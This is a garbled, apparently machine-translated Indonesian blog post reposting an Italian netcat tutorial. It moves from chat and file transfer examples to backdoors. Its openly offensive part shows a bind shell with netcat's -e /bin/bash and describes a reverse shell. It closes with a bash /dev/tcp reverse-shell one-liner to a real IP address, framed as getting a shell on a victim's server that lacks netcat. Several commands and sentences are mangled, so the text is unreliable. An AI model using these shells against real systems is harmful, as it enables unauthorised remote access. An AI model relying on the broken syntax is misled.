Tanpa menggunakan netcat netcat
Oleh
chmood
Saya ingin shell
Netcat jelas merupakan suatu alat yang hebat, juga dikenal sebagai "boxcutter Swiss" dari jaringan.
Penggunaannya sangat sederhana, dapat membuka server mikro atau klien mikro (TCP atau UDP bila ditentukan) untuk mengirim dan menerima data. Hal ini dianggap salinan wajar telnet (dalam semua kasus di mana kita tidak menggunakan telnet untuk bagaimana harus digunakan), dan sangat nyaman untuk digabungkan dengan jaringan pipa dan mantra lainnya bash.
PENGGUNAAN
Netcat dengan satu-satunya batas adalah imajinasi Anda, Anda dapat menggunakannya sebagai semacam obrolan antara dua pengguna, Anda dapat menggunakannya untuk mentransfer file dari satu komputer ke komputer lain, Anda dapat membuat scan dasar pelabuhan, Anda dapat menangkap spanduk jasa, atau dapat digabungkan dengan input atau output dari program lain (seseorang mengatakan pesta?) dan kemudian tidak ada yang melarang kita untuk menggunakannya untuk membuat backdoors nyata untuk mendapatkan remote shell pada target kami.
CONTOH
Chatting antara dua pengguna
untuk membuka port pada komputer Anda dan menempatkan netcat mendengarkan Anda perlu menggunakan parameter -l, menentukan port tertentu dengan parameter p, bukan menggunakan v vv kami memiliki beberapa men-debug keluaran untuk melihat apa yang terjadi.
Jadi kita membuka dua jendela terminal pada 2 komputer yang berbeda (atau bahkan pada mesin yang sama) dan membuka server dengan mengetikkan nc -l -p vv 8080 untuk membuka server pada port 8080 dan juga mencetak output debug, jika semua pergi baik kita akan mendapatkan sesuatu.
┌─ [✗] ─ [Server @ parrot] ─ [~]
└──╼ $ nc -l -p 8080 vv
mendengarkan pada [apapun] 8080 ...
Jika maka kita akan hubungkan ujung lainnya ke port 8080 pada host itu, kita akan mendapatkan interaktif chatting nyata
┌─ [✗] ─ [client @ parrot] ─ [~]
└──╼ $ nc vv localhost 8080
localhost [127.0.0.1] 8080 (http-alt) terbuka
File Transfer
Untuk mentransfer file yang diperlukan untuk mendapatkan isi dari file, dan tuangkan ke standar input dari netcat, sementara di sisi lain Anda harus menyimpan ke file output dari program. Jelas netcat itu adalah saluran dua arah, sehingga tidak peduli siapa yang klien atau server untuk mentransfer file, concatenating kedua stdout stdin program Anda mungkin benar-benar membuat kedua transfer antar file secara bersamaan, sehingga dalam bahwa kita adalah semua gratis.
Asumsikan bahwa kedua klien untuk mengirim miachiave.gpg file dan server untuk menerima, mulai server, predisponiamolo penyelamatan dan kemudian jalankan klien.
┌─ [✗] ─ [Server @ parrot] ─ [~]
└──╼ $ nc -l -p 8080> miachiave.gpg
┌─ [✗] ─ [client @ parrot] ─ [~]
└──╼ $ cat miachiave.gpg | nc localhost 8080
kita dapat melihat bahwa dengan> server akan mengambil semua output dari program dan tuangkan pada file miachiave.gpg, yang tidak ada, akan dibuat, sedangkan client mengirimkan isi file miachiave.gpg stdout dari terminal, tetapi dengan pipa | Hal ini kemudian dituangkan pada stdin dari netcat itu, mendapatkan isi dari file tersebut, mengirimkannya ke server yang akan menyimpan file tujuan baru
Jelas netcat mungkin tidak mengenali EOF (akhir file) dari pipa dan menjaga saluran terbuka sampai kita tidak akan menutupnya, maka nonhardly Anda akan yakin bahwa transfer akan disimpulkan, hanya ctrl + c untuk menghentikan operasi.
Kerang
Memberikan terminal n h menemukan berbagai hal menarik, seperti parameter -c yang memungkinkan Anda menentukan perintah yang akan dijalankan nonhardly Anda membuat sambungan, atau perintah-dan, sangat mirip, tetapi yang memungkinkan kita untuk tidak memulai perintah melalui / bin / sh, melainkan untuk menentukan path lengkap dari program yang ingin kita menggambar.
Sayangnya sering netcat hal itu diubah dan dilaksanakan dengan cara yang berbeda, di beberapa daerah yang fungsi yang akan memungkinkan kita untuk menggunakannya sebagai backdoor, atau bahkan parameter memperoleh arti yang berbeda (c sering digunakan untuk menutup koneksi dengan penerimaan EOF) dihapus sehingga sangat menggantung dari all'usage versi Anda dan jika ada yang download dan dikompilasi versi tanpa keterbatasan.
┌─ [✗] ─ [Korban @ server] ─ [~]
└──╼ $ nc vv l p 8080 -e / bin / bash
mendengarkan pada [apapun] 8080 ...
┌─ [✗] ─ [penyerang @ client] ─ [~]
└──╼ $ nc localhost 8080
Tentunya kita tidak menerima prompt, tapi mengetik perintah akan menerima output.
Jadi kita membuat jenis backdoor dari mengikat, di mana penyerang adalah klien dan server adalah korban, tetapi menempatkan parameter -e pada klien daripada server akan mendapatkan pola terbalik, di mana penyerang akan mendengarkan dan akan korban menghubungkan penyerang yang akan menjadi koneksi server.
Tanpa netcat netcat
Oh ya, server sialan hanya tidak menginstal netcat, saya bisa scaricarmelo dengan wget dari direktori yang dapat ditulis saya menemukan, atau saya bisa menempatkannya di file yang akan ditulis siapa pun, tapi pasti sistem keamanan akan melihat itu semua ' saat ....
Perlu solusi yang efektif!
Dan jika saya menggunakan netcat tanpa menggunakan netcat?
Pada komputer lokal akan cukup untuk menempatkan netcat mendengarkan
┌─ [✗] ─ [penyerang @ parrot] ─ [~]
└──╼ $ nc -l -p 8080 vv
mendengarkan pada [apapun] 8080 ...
Sementara korban harus memanggil bash (atau shell lain yang kita memiliki akses) concatenarla /dev/tcp/<ip.del.nostro.attacker perangkat> / <port> dan bersenang-senang :)
[Korban @ hostname] - $ / bin / bash -i> /dev/tcp/199.175.54.136/8080 0 <1 & 2> & 1
Memberikan mengirim kita akan bertemu shell yang indah di komputer tanpa netcat netcat :)
- Lorenzo "EclipseSpark" Faletra
- Frozenbox Jaringan
- GPG: 442CB088
ini catatan saya -_- Nadya
saya nga izin Copy Baca bacalah :v Special To Team T.I Sniper
Category
Komentar